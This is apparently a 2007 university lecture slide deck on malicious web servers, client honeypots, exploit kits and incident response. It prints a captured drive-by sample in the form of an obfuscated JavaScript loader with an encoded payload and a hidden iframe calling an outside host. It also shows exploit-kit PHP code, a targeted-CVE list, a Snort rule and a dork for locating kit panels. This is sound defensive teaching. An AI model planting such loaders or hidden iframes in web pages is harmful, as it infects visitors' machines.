330 likes | 453 Views
Malicious Web Servers. Christian Seifert. IMT551 31 st October 2007. What are we dealing with?. Honeypot.
E N D
Malicious Web Servers Christian Seifert IMT551 31st October 2007
What are we dealing with? Christian Seifert – IMT551
Honeypot • “A honeypot is a security resource whose value lies in being probed, attacked, or compromised. Honeypots do not have a production value, which makes any activity to, on, and from the honeypot suspicious.” (Lance Spitzner, 2000) • A honeypot can • Act as an intrusion detection sensor • Act as a decoy • Inform security researchers on attackers, their methodology and tools Christian Seifert – IMT551
Request Response Request Client Honeypots Attack Malicious Server Benign Server Client Honeypot • Security device that finds malicious servers on a network No state changes detected New file appeared in start up folder Christian Seifert – IMT551
Client Honeypot Purpose • Intrusion detection device (monitor your own servers) • Defensive technology (blacklist identified malicious servers) • Study aid of malicious servers Christian Seifert – IMT551
KYE Study I • Identified malicious URLs with our client honeypot Capture-HPC • Examined malicious URLs, their exploits and deployed malware • Made recommendations to fend off (or at least reduce the risk) of the client-side attack threat • Questions we intended to answer: • What is the risk? • Where are malicious servers located on the web? • Are there any areas at higher risk? • How effective is patching? • How effective is blacklisting? • Are all browsers targeted? If so, to what extent? Christian Seifert – IMT551
Capture-HPC • Open-Source client honeypot (https://www.client-honeynet.org/capture.html) • Ability to drive any HTTP aware client application • Ability to monitor Windows Registry, file system, processes on the kernel level • Collect modified files (malware) • Collect network traffic "file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EX E","Write","C:\Documents and Settings\Administrator\tmpms45.exe" "process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE .EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr0.dat“ "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\ WINDOWS\system32\config\system" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr1.dat" "process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmp ms45.exe","created","C:\Program Files\Outlook Express\wab.exe" "file","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE.EX E","Write","C:\Documents and Settings\Administrator\tmpms45.exe" "process","Oct 25, 2007 5:35:41 PM","C:\Program Files\Internet Explorer\IEXPLORE .EXE","created","C:\Documents and Settings\Administrator\tmpms45.exe" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr0.dat“ "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\services.exe","Write","C:\ WINDOWS\system32\config\system" "file","Oct 25, 2007 5:35:43 PM","C:\WINDOWS\system32\svchost.exe","Write","C:\D ocuments and Settings\All Users\Application Data\Microsoft\Network\Downloader\qm gr1.dat" "process","Oct 25, 2007 5:35:43 PM","C:\Documents and Settings\Administrator\tmp ms45.exe","created","C:\Program Files\Outlook Express\wab.exe" Christian Seifert – IMT551
Input URLs • 340,000 URLs inspected by standard WinXP IE6SP2 client honeypot • Specific content categories (adult, forums, music, news, hacker sites) • Previously defaced and vulnerable web servers • Advertisements • Typos (e.g. www.googel.com) • Spam • Known bad sites Christian Seifert – IMT551
Results: Where are malicious servers located on the web? • 0.02 – 0.6 % likelihood of a URL being able to successfully attack a WinXP IE6SP2 installation • Malicious web servers exist everywhere • Spam links, hacker sites, adult sites are high risk areas on the web Christian Seifert – IMT551
Exploits Used / Malware Deployed • Exploits are obfuscated • Antivirus was unable to identify all malware • Social engineering was used to avoid raising suspicion <script language=JavaScript> function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,21,4,60,32,52,45,13,28,0,0,0,0,0,0,5,42,57,37,41,48,62,59,56,24,46,31,38,12,3,27,19,1,39,36,6,26,44,20,9,33,34,0,0,0,0,43,0,15,53,40,8,2,54,16,7,0,14,23,18,11,22,58,35,51,50,29,25,47,10,30,55,49,61);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(250^w&255);w>>=8;s-=2}else{s=6}} document.write(r)}}dc('TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtRloHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM')\ </script> <iframe src='http://crunet.biz/out.php' width='1' height='1' style='visibility: hidden;'></iframe> “file","Write","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe" “process","Created","C:\Program Files\Internet Explorer\IEXPLORE.EXE","C:\syswcon.exe" “registry","SetValueKey","C:\syswcon.exe","HKCU\Software\ewrew\syswcon\main\cid" ... “file","Write","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe" “process","Created","C:\syswcon.exe","C:\WINDOWS\system32\drivers\uzcx.exe" “registry","SetValueKey", ... ... Christian Seifert – IMT551
Is Blacklisting a successful strategy? • Blacklisting blocks specific IP addresses of hosts on the firewall or DNS server • Stopbadware.org and mvps.org (hosts file) was used in DNS blackholing • 306 malicious sites were once again inspected with our client honeypot • Only 1 URL remained malicious Christian Seifert – IMT551
Is patching a successful strategy? • All malicious URLs inspected with fully patched version of Internet Explorer 6 • Result: 0 successful compromises • Unpatched vulnerabilities… still not safe… • VML vulnerability disclosed September 19, 2006; patch was available September 26, 2006 • ANI vulnerability disclosed March 29, 2007; patch was available April 3, 2007 Christian Seifert – IMT551
What browser is safer to use? • Inspected approx. 30,000 adult content URLs • Used older browsers as they are more vulnerable: • Microsoft Internet Explorer 6.0 SP 2 – Aug 2004 • Mozilla Firefox 1.5.0 – Nov 2005 • Opera 8.0.0 – Apr 2005 • Remote code execution vulnerabilities: Christian Seifert – IMT551
What browser is safer to use? Results Christian Seifert – IMT551
Study Summary • Malicious web servers exist everywhere • SPAM links, hacker sites are particularly risky; adult entertainment sites even more so • Security vendors do know about malicious URLs, but do not know all malicious URLs • Internet Explorer 6 SP2 is more targeted than Firefox or Opera. • A fully patched Internet Explorer 6 was not successfully attacked • Blacklisting reduced the risk significantly. Christian Seifert – IMT551
Recommendations • Use client applications with non-administrative privileges • Use personal firewalls that restrict outbound traffic • Use non-mainstream browser with immediate patching mechanism (e.g. Firefox) • Blacklist (Hosts file, bad sites (e.g. stopbadware.org)) • Patch…think about plug-ins and non-browser applications (Secunia Software Inspector) • Investigate the URLs that users access with a client honeypot, such as Capture-HPC Christian Seifert – IMT551
KYE Study II • Client honeypots are a black box approach • Don’t know what is happening on the malicious web server. • Questions remained unanswered: • How can we explain non-deterministic behavior? • Are browsers other than Internet Explorer targeted? • Are centralized exploit servers a common aspect? • Are there weaknesses in the obfuscation routine? Christian Seifert – IMT551
Web Exploitation Kits • Easily host web based client-side exploits • First appeared in early 2006 • WebAttacker, MPack, IcePack • Costs between 15$ - 1000$ • Simple script-based web applications Christian Seifert – IMT551
Administrative Interface (Mpack) Christian Seifert – IMT551
IP Tracking • Non-deterministic behavior • Only launch attack once • Purpose…unknown 01: //checks and saves user's IP hashed with browser 02: //to avoid future browser's hangup 03: function CheckAddUser() { 04: global $UseMySQL; 05: global $dbstats; 06: $ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT")); 07: if ($UseMySQL==0) { 08: //text variant 09: $fn="users.txt"; 10: if (file_exists($fn)) { 11: $lines = file($fn); 12: if (in_array($ipua."\n", $lines)==TRUE) { 13: echo ";["; 14: exit; 15: } 16: } ... Christian Seifert – IMT551
Targets? IcePack Targets: • Microsoft Data Access Component Vulnerability (CVE-2006-0003) • WebViewFolderIcon ActiveX Control Buffer Overflow Vulnerability (CVE-2006-3730) • Microsoft Management Console Vulnerability (CVE-2006-3643) • Vector Markup Language Vulnerability (CVE-2007-0024) • Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX (CVE-2007-4336) • Yahoo! Messenger Webcam ActiveX Remote Buffer Overflow Vulnerability (CVE-2007-3147, CVE-2007-3148) • Yahoo! Widgets YDP ActiveX Control Buffer Overflow Vulnerability (CVE-2007-4034) • Windows Media Player Plug-In with Non-Microsoft Internet Explorer Vulnerability (CVE-2006-0005) • Windows Media Player Plug-In with Non-Microsoft Internet Explorer Vulnerability (CVE-2006-0005) • JavaScript Navigator Object Vulnerability (CVE-2006-3677) Christian Seifert – IMT551
Exploit Servers • Administrative interfaceprovides information Christian Seifert – IMT551
Exploit Servers • High value information • Easily identifiable • Via crawlers & IDS signatures: • Or search engine queries: • inurl:”admin.php” “All activity is being monitored” alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Access to MPack v0.94 web exploitation kit administrative console” flow:from_server,established; uricontent:"/admin.php”; content:"All activity is being monitored"; reference:url, http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/2005/2011/MPack.pdf; classtype:bad-unknown; sid:TBD; rev:1;) Christian Seifert – IMT551
Obfuscation • Obfuscation is the mechanism to hide attacks from signature based approaches by modifying the appearance of the malicious content • How effective is it? • Web exploitation kits were using little randomization. 001 - “dsasdhajkh” 002 - “fdshfjqeqqeq” “malicious content” … 255 - “ffdsfdsasaq” Christian Seifert – IMT551
Summary • Access to web exploitation kits give us insights into malicious web servers that client honeypot can not provide us • Web exploitation kits are a threat, but also a blessing (homogenizing effect) • Implications on client honeypot technology • Stock Windows XP SP2 installation insufficient. Third-party apps need to be considered • Distributed architecture will be required Christian Seifert – IMT551
Incident Response • Assume you discover an attack by a malicious web server. The attack has caused great damage and you would like to track down and prosecute the person responsible. • How would you go about it? • What data would you collect? Christian Seifert – IMT551
Food For ThoughtAddress Resolution Protocol (ARP) 6. Http Response 1. Http Request to Web Server at IP 192.168.77.250 4. Http Request to 192.168.77.250 2. Who has IP 192.168.77.250? 3. I have that IP! 5. Http Response Christian Seifert – IMT551
Food For ThoughtARP 9. Malicious Http Response 1. Http Request to Web Server at IP 192.168.77.250 2. Who has IP 192.168.77.250? 5. Http Request to 192.168.77.250 4. I have that IP! 8. Malicious Http Response 6. Http Request 3. I have that IP! 7. Http Response Christian Seifert – IMT551
Food For ThoughtDomain Name Resolution • Translate host names (e.g. www.google.com) to IP addresses (72.14.253.99) Where is www.google.com? www.google.com is at 72.14.253.99 Christian Seifert – IMT551
Food For ThoughFast Flux Networks Where is www.badsite.com? www.badsite.com is at 130.14.253.99 Where is www.badsite.com? www.badsite.com is at 130.195.38.22 Christian Seifert – IMT551
Food For ThoughFast Flux Networks 1 Where is www.badsite.com? Try this one 2 www.badsite.com is at 130.182.12.11 Try this one 3 www.badsite.com is at 130.182.12.11 Christian Seifert – IMT551
Conclusion • Incident response not so easy • Expect the unexpected • Perform an analysis/ practice before an incident occurs Christian Seifert – IMT551
http://www.honeynet.org/papers/mwshttps://www.client-honeynet.orghttp://en.wikipedia.org/wiki/Client_honeypot_/_honeyclient Questions?http://www.honeynet.org/papers/mwshttps://www.client-honeynet.orghttp://en.wikipedia.org/wiki/Client_honeypot_/_honeyclient Questions?